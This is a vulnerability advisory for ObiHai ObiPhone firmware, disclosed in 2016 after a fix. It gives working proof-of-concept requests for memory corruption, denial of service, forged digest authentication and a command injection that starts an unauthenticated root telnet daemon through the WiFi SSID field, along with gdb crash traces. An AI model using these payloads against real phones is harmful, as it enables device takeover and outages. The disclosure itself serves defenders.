1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 |
ObiHai ObiPhone - Multiple Vulnerabilities ------------------------------------------ Introduction ============ Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products.The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive. Affected Devices and Versions ============================= ObiPhone 1032/1062 with firmware less than 5-0-0-3497. Vulnerability Overview ====================== Obi-1. Memory corruption leading to free() of an attacker-controlled address Obi-2. Command injection in WiFi Config Obi-3. Denial of Service due to buffer overflow Obi-4. Buffer overflow in internal socket handler Obi-5. Cross-site request forgery Obi-6. Failure to implement RFC 2617 correctly Obi-7. Invalid pointer dereference due to invalid header Obi-8. Null pointer dereference due to malicious URL Obi-9. Denial of service due to invalid content-length Vulnerability Details ===================== ---------------------------------------------------------------------------- Obi-1. Memory corruption leading to free() of an attacker-controlled address ---------------------------------------------------------------------------- By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free().By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application.Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault. python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80 (gdb) bt #00x479d8b18 in free () from root/lib/libc.so.6 #10x00135f20 in ?? () (gdb) x/5i $pc => 0x479d8b18 <free+48>:ldr r3, [r0, #-4] 0x479d8b1c <free+52>:sub r5, r0, #8 0x479d8b20 <free+56>:tst r3, #2 0x479d8b24 <free+60>:bne 0x479d8bec <free+260> 0x479d8b28 <free+64>:tst r3, #4 (gdb) i r r0 r0 0x41 65 --------------------------------------- Obi-2. Command injection in WiFi Config --------------------------------------- An authenticated user (including the lower-privileged "user" user) can enter a hidden network name similar to "$(/usr/sbin/telnetd &)", which starts the telnet daemon. GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1 Host: foo Authorization: [omitted] Note that telnetd is now running and accessible via user "root" with no password. ----------------------------------------------- Obi-3. Denial of Service due to buffer overflow ----------------------------------------------- By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash.Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process.strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test. python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80 (gdb) bt #00x479dc440 in strcpy () from root/lib/libc.so.6 #10x001361c0 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) x/5i $pc => 0x479dc440 <strcpy+16>:strbr3, [r1, r2] 0x479dc444 <strcpy+20>:bne 0x479dc438 <strcpy+8> 0x479dc448 <strcpy+24>:bxlr 0x479dc44c <strcspn>:push{r4, r5, r6, lr} 0x479dc450 <strcspn+4>:ldrbr3, [r0] (gdb) i r r1 r2 r1 0xb434df01 3023363841 r2 0xff 255 (gdb) p/x $r1+$r2 $1 = 0xb434e000 ------------------------------------------------- Obi-4. Buffer overflow in internal socket handler ------------------------------------------------- Commands to be executed by realtime backend process <code>obid</code> are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack.This string can overflow the static buffer, leading to control of program flow.The only vectors leading to this code that were discovered during the assessment were authenticated, however unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged "user" user. GET /wifi?checkssid=[A*1024] HTTP/1.1 Host: foo Authorization: [omitted] (gdb) #00x41414140 in ?? () #10x0006dc78 in ?? () --------------------------------- Obi-5. Cross-site request forgery --------------------------------- All portions of the web interface appear to lack any protection against Cross-Site Request Forgery.Combined with the command injection vector in ObiPhone-3, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged-in to the phone. ---------------------------------------------- Obi-6. Failure to implement RFC 2617 correctly ---------------------------------------------- RFC 2617 specifies HTTP digest authentication, but is not correctly implemented on the ObiPhone.The HTTP digest authentication fails to comply in the following ways: - The URI is not validated - The application does not verify that the nonce received is the one it sent - The application does not verify that the nc value does not repeat or go backwards GET / HTTP/1.1 Host: foo Authorization: Digest username="admin", realm="a", nonce="a", uri="/", algorithm=MD5, response="309091eb609a937358a848ff817b231c", opaque="", qop=auth, nc=00000001, cnonce="a" Connection: close HTTP/1.1 200 OK Server: OBi110 Cache-Control:must-revalidate, no-store, no-cache Content-Type: text/html Content-Length: 1108 Connection: close Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline. -------------------------------------------------------- Obi-7. Invalid pointer dereference due to invalid header -------------------------------------------------------- Sending an invalid HTTP Authorization header, such as "Authorization: foo", causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device.This requires no authentication, only access to the network to which the device is connected. GET / HTTP/1.1 Host: foo Authorization: foo This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code. (gdb) bt #00x479dc438 in strcpy () from root/lib/libc.so.6 #10x00134ae0 in ?? () (gdb) x/5i $pc => 0x479dc438 <strcpy+8>: ldrbr3, [r1, #1]! 0x479dc43c <strcpy+12>:cmp r3, #0 0x479dc440 <strcpy+16>:strbr3, [r1, r2] 0x479dc444 <strcpy+20>:bne 0x479dc438 <strcpy+8> 0x479dc448 <strcpy+24>:bxlr (gdb) i r r1 r1 0xffffffff 4294967295 ---------------------------------------------------- Obi-8. Null pointer dereference due to malicious URL ---------------------------------------------------- If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone.This requires no authentication, only access to the network to which the device is connected. GET /obihai-xml HTTP/1.1 Host: foo (gdb) bt #00x479dc7f4 in strlen () from root/lib/libc.so.6 Backtrace stopped: Cannot access memory at address 0x8f6 (gdb) info frame Stack level 0, frame at 0xbef1aa50: pc = 0x479dc7f4 in strlen; saved pc = 0x171830 Outermost frame: Cannot access memory at address 0x8f6 Arglist at 0xbef1aa50, args: Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50 (gdb) x/5i $pc => 0x479dc7f4 <strlen+4>: ldr r2, [r1], #4 0x479dc7f8 <strlen+8>: andsr3, r0, #3 0x479dc7fc <strlen+12>:rsb r0, r3, #0 0x479dc800 <strlen+16>:beq 0x479dc818 <strlen+40> 0x479dc804 <strlen+20>:orr r2, r2, #255; 0xff (gdb) i r r1 r1 0x00 ------------------------------------------------------ Obi-9. Denial of service due to invalid content-length ------------------------------------------------------ Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution.Larger (more negative) values return a page stating "Firmware Update Failed" though it does not appear any attempt to update the firmware with the posted data occurred. POST / HTTP/1.1 Host: foo Content-Length: -1 Foo This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application. (gdb) bt #00x00138250 in HTTPD_msg_proc () #10x00070138 in ?? () (gdb) x/5i $pc => 0x138250 <HTTPD_msg_proc+396>: strbr1, [r3, r2] 0x138254 <HTTPD_msg_proc+400>: ldr r1, [r4, #24] 0x138258 <HTTPD_msg_proc+404>: ldr r0, [r4, #88] ; 0x58 0x13825c <HTTPD_msg_proc+408>: bl0x135a98 0x138260 <HTTPD_msg_proc+412>: ldr r0, [r4, #88] ; 0x58 (gdb) i r r3 r2 r3 0xafcc7000 2949410816 r2 0xffffffff 4294967295 Mitigation ========== Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer. Author ====== The issues were discovered by David Tomaschik of the Google Security Team. Timeline ======== - 2016/05/12 - Reported to ObiHai - 2016/05/12 - Findings Acknowledged by ObiHai - 2016/05/20 - ObiHai reports working on patches for most issues - 2016/06/?? - New Firmware posted to ObiHai Website - 2016/08/18 - Public Disclosure |